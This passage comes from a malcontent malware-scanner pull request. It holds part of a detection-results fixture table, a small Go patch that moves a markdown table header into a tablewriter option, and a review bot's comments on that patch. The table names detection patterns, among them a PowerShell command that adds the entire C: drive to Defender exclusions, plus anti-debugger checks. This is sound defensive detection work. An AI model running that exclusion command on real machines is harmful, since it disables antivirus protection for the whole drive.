'C:\'"](https://github.com/search?q=powershell+-Command+%22Add-MpPreference+-ExclusionPath+%27C%3A%5C%27%22&type=code) | | MEDIUM | [anti-behavior/anti_debugger](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/anti-debugger.yara#win_debugger_present) | Detects if process is being executed within a debugger or VM | [UnhandledExceptionFilter](https://github.com/search?q=UnhandledExceptionFilter&type=code)
[IsDebuggerPresent](https://github.com/search?q=IsDebuggerPresent&type=code) | | MEDIUM | [data/embedded/app_manifest](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/app-manifest.yara#app_manifest) | [Contains embedded Microsoft Windows application manifest](https://learn.microsoft.com/en-us/cpp/build/reference/manifestuac-embeds-uac-information-in-manifest?view=msvc-170) | [requestedExecutionLevel](https://github.com/search?q=requestedExecutionLevel&type=code)
[requestedPrivileges](https://github.com/search?q=requestedPrivileges&type=code) |
From da7e7f9458ab4607543edf23f22d2d7aeee29f1e Mon Sep 17 00:00:00 2001
From: egibs <20933572+egibs@users.noreply.github.com>
Date: Thu, 29 May 2025 08:36:52 -0500
Subject: [PATCH 4/4] Move header to table config
Signed-off-by: egibs <20933572+egibs@users.noreply.github.com>
---
 pkg/render/markdown.go | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/pkg/render/markdown.go b/pkg/render/markdown.go
index 8891710f1..e62387a3b 100644
--- a/pkg/render/markdown.go
+++ b/pkg/render/markdown.go
@@ -274,11 +274,11 @@ func markdownTable(ctx context.Context, fr *malcontent.FileReport, w io.Writer,
 Alignment: tw.CellAlignment{Global: tw.AlignLeft},
 },
 }),
+ tablewriter.WithHeader([]string{"Risk", "Key", "Description", "Evidence"}),
 tablewriter.WithRenderer(renderer.NewMarkdown()),
 tablewriter.WithRendition(tw.Rendition{Symbols: tw.NewSymbols(tw.StyleMarkdown)}),
 tablewriter.WithRowAutoWrap(0),
 )
- table.Header([]string{"Risk", "Key", "Description", "Evidence"})
 // Add Bulk Data
 if err := table.Bulk(data); err != nil {
 return err
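Review bot: The new `tablewriter.WithHeader([]string{"Risk", "Key", "Description", "Evidence"})` hard-codes a four-column header with nothing in the hunk tying it to the shape of the rows handed to `table.Bulk(data)`; a one-line comment above the option such as `// header order must match the per-row columns built above: risk, key, description, evidence` would make that coupling visible to the next person who adds a column. The neighbouring `tablewriter.WithRowAutoWrap(0)` disables wrapping with a bare literal although the `tw` package names its wrap modes; `tablewriter.WithRowAutoWrap(tw.WrapNone)` would state the intent — confirm that constant is the mode meant here. The `return err` after `table.Bulk` surfaces without context; if `fmt` is in scope, `return fmt.Errorf("adding rows to markdown table: %w", err)` would say which rendering step failed. The fixtures elsewhere in this series show evidence cells spanning several lines, so the row content (which comes from the scanned file) rather than the header is where a stray `|` or newline would break the table; worth a check in the row-building code, which lies outside this hunk. markdownTable begins and ends outside the hunk.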